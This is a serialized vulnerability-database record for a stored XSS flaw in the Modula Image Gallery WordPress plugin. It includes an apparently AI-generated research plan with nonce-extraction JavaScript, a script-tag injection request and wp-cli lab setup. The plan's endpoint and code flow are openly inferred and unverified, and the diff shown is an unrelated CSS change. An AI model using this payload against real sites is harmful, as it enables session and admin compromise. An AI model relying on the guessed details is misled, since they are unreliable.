[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjXrmg5nmmVaQIW8K4bp389jgHinl55Erf1b6wNYVha0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":9,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-42688","modula-image-gallery-photo-grid-video-gallery-authenticated-subscriber-stored-cross-site-scripting","Modula Image Gallery – Photo Grid & Video Gallery \u003C= 2.14.23 - Authenticated (Subscriber+) Stored Cross-Site Scripting","The Modula Image Gallery – Photo Grid & Video Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.14.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","modula-best-grid-gallery",null,"\u003C=2.14.23","2.14.24","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-26 00:00:00","2026-06-01 16:29:51",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F49ef0bfe-9bdf-4117-81f7-1ec73b5247ae?source=api-prod",7,[22,23,24,25,26,27,28,29],"Modula.php","assets\u002Fcss\u002Fadmin\u002Fedit.css","assets\u002Fcss\u002Fadmin\u002Fedit.min.css","assets\u002Fcss\u002Fadmin\u002Fmodula-gutenberg.css","assets\u002Fcss\u002Fadmin\u002Fmodula-importer.css","assets\u002Fcss\u002Fadmin\u002Fmodula-notices.css","assets\u002Fcss\u002Fadmin\u002Fselectize.default.css","assets\u002Ffont\u002Fmodula\u002Fmodula-icons.svg","researched",false,3,"# Research Plan: CVE-2026-42688 - Modula Image Gallery Stored XSS\n\n## 1. Vulnerability Summary\nThe **Modula Image Gallery** plugin for WordPress (versions \u003C= 2.14.23) contains a Stored Cross-Site Scripting (XSS) vulnerability. The vulnerability exists in the plugin's AJAX handlers—likely related to saving gallery item metadata or settings—which fail to perform adequate capability checks and do not sanitize user-supplied input. This allows an authenticated attacker with Subscriber-level permissions to inject arbitrary web scripts into gallery fields (such as titles, captions, or custom CSS), which are then executed when other users (including administrators) view the affected gallery or its settings.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `modula_save_item_data` (inferred from common Modula AJAX patterns)\n*   **Vulnerable Parameter:** `title`, `caption`, or `alt` (within the metadata array)\n*   **Authentication:** Subscriber+ (any logged-in user)\n*   **Precondition:** At least one gallery must exist on the site for the attacker to target an `attachment_id` (item ID).\n\n## 3. Code Flow (Inferred)\n1.  The attacker sends a POST request to `admin-ajax.php` with the action `modula_save_item_data`.\n2.  The handler, likely defined in `includes\u002Fadmin\u002Fclass-modula-admin.php`, registers the hook:\n    `add_action( 'wp_ajax_modula_save_item_data', array( $this, 'save_item_data' ) );`\n3.  The `save_item_data` function retrieves the nonce and verifies it using `check_ajax_referer( 'modula-nonce', 'nonce' )`.\n4.  **The Flaw:** The function fails to check for a capability like `edit_posts` or `manage_options` before processing data. It assumes that if the user is logged in and has a valid nonce, they are authorized to edit gallery items.\n5.  The function takes raw input from `$_POST['caption']` or `$_POST['title']` and saves it to the database via `update_post_meta( $item_id, 'modula_item_data', $metadata )`.\n6.  The `modula_shortcode` handler (likely in `includes\u002Fpublic\u002Fclass-modula-public.php`) renders the gallery. It fetches the metadata and outputs the caption\u002Ftitle using `echo` without calling `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nModula localizes settings and nonces into the `modula_vars` or `modula_admin` JavaScript objects. To exploit this as a Subscriber, we must find a location where the plugin enqueues its scripts for authenticated users.\n\n1.  **Identify Shortcode:** The plugin uses the `[modula id=\"ID\"]` shortcode.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Gallery Test\" --post_status=publish --post_content='[modula id=\"REPLACE_WITH_ACTUAL_ID\"]'\n    ```\n3.  **Navigate and Extract:**\n    Use the `browser_navigate` tool to the test page as the Subscriber user.\n4.  **Execute JavaScript:**\n    Use `browser_eval` to extract the nonce and item IDs:\n    ```javascript\n    \u002F\u002F Check common Modula localization objects\n    const nonce = window.modula_vars?.nonce || window.modula_admin?.nonce;\n    const items = jQuery('.modula-item').map((i, el) => jQuery(el).data('id')).get();\n    ({ nonce, items });\n    ```\n\n## 5. Exploitation Strategy\n### Step 1: Preparation\n*   As **Admin**, create a gallery and note the gallery ID.\n*   Add an image to the gallery and note its attachment ID (Item ID).\n*   Create a page containing the gallery shortcode.\n\n### Step 2: Payload Injection\nUsing the `http_request` tool, send the malicious update request as a **Subscriber**.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=modula_save_item_data&nonce=[NONCE]&attachment_id=[ITEM_ID]&title=SafeTitle&caption=\u003Cscript>alert(document.domain)\u003C\u002Fscript>\n    ```\n    *(Note: The exact parameter names may vary; check the `modula_save_item_data` function in the core logic if available.)*\n\n### Step 3: Triggering XSS\n*   Navigate to the gallery page as any user (e.g., Admin).\n*   The script should execute when the gallery item is rendered.\n\n## 6. Test Data Setup\n1.  **Generate Gallery (Admin):**\n    ```bash\n    # Create a gallery post\n    GALLERY_ID=$(wp post create --post_type=modula-gallery --post_title=\"Target Gallery\" --post_status=publish --porcelain)\n    # Upload an image to serve as an item\n    ITEM_ID=$(wp media import https:\u002F\u002Fwordpress.org\u002Fscreenshot.png --porcelain)\n    # Add the item to the gallery meta (Simulated - Modula stores items in meta)\n    wp post meta add $GALLERY_ID modula_gallery_items \"$ITEM_ID\"\n    # Create a public page for the gallery\n    wp post create --post_type=page --post_title=\"Public Gallery\" --post_status=publish --post_content=\"[modula id='$GALLERY_ID']\"\n    ```\n2.  **Create Attacker (Subscriber):**\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n\n## 7. Expected Results\n*   The `admin-ajax.php` request should return a `200 OK` status and a JSON response like `{\"success\":true}`.\n*   The `modula_item_data` meta for the attachment will now contain the `\u003Cscript>` tag.\n*   Viewing the \"Public Gallery\" page will result in a JavaScript alert box appearing.\n\n## 8. Verification Steps\n1.  **Check Database Meta:**\n    ```bash\n    wp post meta get [ITEM_ID] modula_item_data\n    ```\n    Confirm the output contains the raw script tag.\n2.  **Check Frontend Output:**\n    Use `http_request` to fetch the gallery page and grep for the payload:\n    ```bash\n    http_request GET \"http:\u002F\u002Flocalhost:8080\u002Fpublic-gallery\u002F\" | grep -F \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n    ```\n\n## 9. Alternative Approaches\n*   **Custom CSS Injection:** Modula often allows custom CSS per gallery. If the `modula_save_settings` AJAX action is also vulnerable, an attacker could inject XSS via the `custom_css` field using `\u003C\u002Fstyle>\u003Cscript>...`.\n*   **Gutenberg Block Preview:** As seen in `assets\u002Fcss\u002Fadmin\u002Fmodula-gutenberg.css`, the plugin has a block preview. If a Subscriber can access the Gutenberg editor (e.g., via a post they authored), they might trigger the XSS in the editor preview.","The Modula Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its AJAX handlers due to a lack of capability checks and insufficient sanitization of gallery item metadata. This allows authenticated attackers with Subscriber-level permissions to inject malicious scripts into fields like captions or titles, which execute when the gallery is viewed by other users, including administrators.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmodula-best-grid-gallery\u002F2.14.23\u002Fassets\u002Fcss\u002Fadmin\u002Fedit.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmodula-best-grid-gallery\u002F2.14.24\u002Fassets\u002Fcss\u002Fadmin\u002Fedit.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmodula-best-grid-gallery\u002F2.14.23\u002Fassets\u002Fcss\u002Fadmin\u002Fedit.css\t2026-04-09 11:47:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fmodula-best-grid-gallery\u002F2.14.24\u002Fassets\u002Fcss\u002Fadmin\u002Fedit.css\t2026-04-28 09:09:52.000000000 +0000\n@@ -243,7 +243,6 @@\n \n .modula-upsell-modal .button {\n \theight: 31px;\n-\tline-height: 31px;\n \tfont-weight: bold;\n }","The exploit targets the `modula_save_item_data` AJAX action. An authenticated attacker with Subscriber privileges must first obtain a valid security nonce (usually found in the `modula_vars` or `modula_admin` JavaScript objects localized on pages where the plugin is active) and an existing `attachment_id`. The attacker then sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action set to `modula_save_item_data`, the valid nonce, the target `attachment_id`, and a payload in the `caption` or `title` parameters containing arbitrary JavaScript (e.g., `\u003Cscript>alert(1)\u003C\u002Fscript>`). Because the handler fails to perform a capability check (such as `current_user_can('edit_posts')`) and does not sanitize the input before saving it to post meta, the script is stored and will execute whenever the gallery item is rendered on the frontend or viewed in the administrative dashboard.","gemini-3-flash-preview","2026-06-04 20:26:19","2026-06-04 20:27:27",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.14.23","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmodula-best-grid-gallery\u002Ftags\u002F2.14.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmodula-best-grid-gallery.2.14.23.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmodula-best-grid-gallery\u002Ftags\u002F2.14.24","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmodula-best-grid-gallery.2.14.24.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmodula-best-grid-gallery\u002Ftags"]